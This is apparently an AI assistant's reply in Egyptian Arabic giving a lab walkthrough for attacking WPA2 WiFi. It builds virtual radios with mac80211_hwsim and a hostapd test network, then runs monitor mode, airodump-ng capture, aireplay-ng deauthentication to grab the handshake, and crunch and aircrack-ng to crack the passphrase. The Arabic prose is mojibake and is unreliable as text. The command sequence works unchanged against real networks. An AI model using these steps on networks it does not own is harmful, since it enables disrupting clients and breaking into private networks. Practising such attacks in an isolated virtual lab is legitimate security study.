ุชูุงู ๐ ุฎูููุง ูุดุชุบููุง ุจุงูุฎุทูุงุช ูุฃููุง ุจูุตูุน **ุฃุฏุงุจุชูุฑ ุงูุชุฑุงุถู** ููุนูู ุดุจูุฉ ูุงููุฉ ููุฌุฑูุจ ุนูููุง. ูุฏู ููู ุฌููู ูุงูู ูู ุบูุฑ ูุง ุชุดุชุฑู USB Wi-Fi.

---

# ๐น 1) ุฅูุดุงุก ุฃุฏุงุจุชูุฑ ุงูุชุฑุงุถู (mac80211\_hwsim)

ุงูููุฏููู `mac80211_hwsim` ุจูุนูู ูุฑูุช Wi-Fi ุงูุชุฑุงุถูุฉ:

```bash
sudo modprobe -r mac80211_hwsim || true
sudo modprobe mac80211_hwsim radios=3
```

ุฏู ููุนูู 3 ูุงุฌูุงุช:

* `wlan0` โ ููุฎูููุง **Access Point**.
* `wlan1` โ ููุฎูููุง **Client**.
* `wlan2` โ ููุฎูููุง **Monitor Adapter** (ูุฃูู ุนูุฏู ุฃุฏุงุจุชูุฑ ุญูููู).

ุดูููู:

```bash
iw dev
```

---

# ๐น 2) ุฅูุดุงุก ุดุจูุฉ Wi-Fi (Access Point)

ูุนูู ููู ุฅุนุฏุงุฏ ููู AP:

```bash
cat > /tmp/ap.conf <<EOF
interface=wlan0
driver=nl80211
ssid=TestLab
hw_mode=g
channel=6
wpa=2
wpa_passphrase=12345678
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
```

ูุดุบูู ุงูุดุจูุฉ:

```bash
sudo hostapd /tmp/ap.conf
```

> ููุธูุฑูู ุดุจูุฉ ุงุณููุง **TestLab** ูุจุงุณูุฑุฏูุง **12345678**.

---

# ๐น 3) ุชูุตูู ุนููู ุจุงูุดุจูุฉ

ูู ุชุฑูููุงู ุฌุฏูุฏ:

```bash
wpa_passphrase TestLab 12345678 | sudo tee /tmp/wpa.conf >/dev/null
sudo wpa_supplicant -i wlan1 -c /tmp/wpa.conf -B
sudo dhclient wlan1
```

ุฏูููุชู ุงูู `wlan1` ูุชุตู ุจุงูู `TestLab`.

---

# ๐น 4) ุชุดุบูู ุฃุฏุงุจุชูุฑ ุงูู Monitor

ูููู ุงูุฎุฏูุงุช ูููุนูู ุงูู monitor mode:

```bash
sudo airmon-ng check kill
sudo airmon-ng start wlan2
```

ุฏูููุชู ุนูุฏู `wlan2mon` = ุฃุฏุงุจุชูุฑู ุงูุงูุชุฑุงุถู.

---

# ๐น 5) ุชุฌุฑุจ ุงูุชุฌุณุณ/ุงูุงุฎุชุจุงุฑ ุนูู ุงูุดุจูุฉ

## ูุณุญ ุงูุดุจูุงุช:

```bash
sudo airodump-ng wlan2mon
```

ูุชูุงูู ุดุจูุฉ **TestLab** ูุงูุนููู ุงููุชุตู.

## ุญูุธ ุงููุงุจุชุดุฑ ูู ุงูุดุจูุฉ:

```bash
sudo airodump-ng --bssid <BSSID_AP> -c 6 -w capture wlan2mon
```

## ุนูู deauth ุนุดุงู ุชูุชูุท Handshake:

```bash
sudo aireplay-ng --deauth 5 -a <BSSID_AP> -c <ClientMAC> wlan2mon
```

ุจุนุฏูุง ููุง ุงูุนููู ูุนูุฏ ุงูุงุชุตุงู โ ููุชุณุฌู ุงูู Handshake ูู `capture.cap`.

---

# ๐น 6) ูุณุฑ ูููุฉ ุงููุฑูุฑ (ุชุฌุฑุจุฉ ุชุนููููุฉ)

ุชูููุฏ wordlist ุจุณูุท:

```bash
crunch 8 8 12345678 -o wordlist.txt
```

ุชุดุบูู aircrack:

```bash
aircrack-ng -w wordlist.txt -b <BSSID_AP> capture.cap
```

---

โ ูุฏู ุฅูุช ุนููุช:

1. **ุฃุฏุงุจุชูุฑ ุงูุชุฑุงุถู**.
2. **ุดุจูุฉ ุชุฌุฑูุจูุฉ**.
3. **ุงุชุตุงู ุนููู**.
4. **ุฃุฏุงุจุชูุฑ monitor**.
5. **ุชุฌุฑุจุฉ ูุงููุฉ (scan โ capture โ deauth โ crack)**.

---

ุชุญุจ ุฃูุชุจูู ุงูุฃูุงูุฑ ุฏู ูููุง ูู **ุณูุฑูุจุช ูุงุญุฏ ุฌุงูุฒ** ุจุญูุซ ุชุดุบููู ุฎุทูุฉ ุจุฎุทูุฉ ุจุฏู ูุง ุชููุฐ ูู ุฃูุฑ ุจุฅูุฏูุ
==
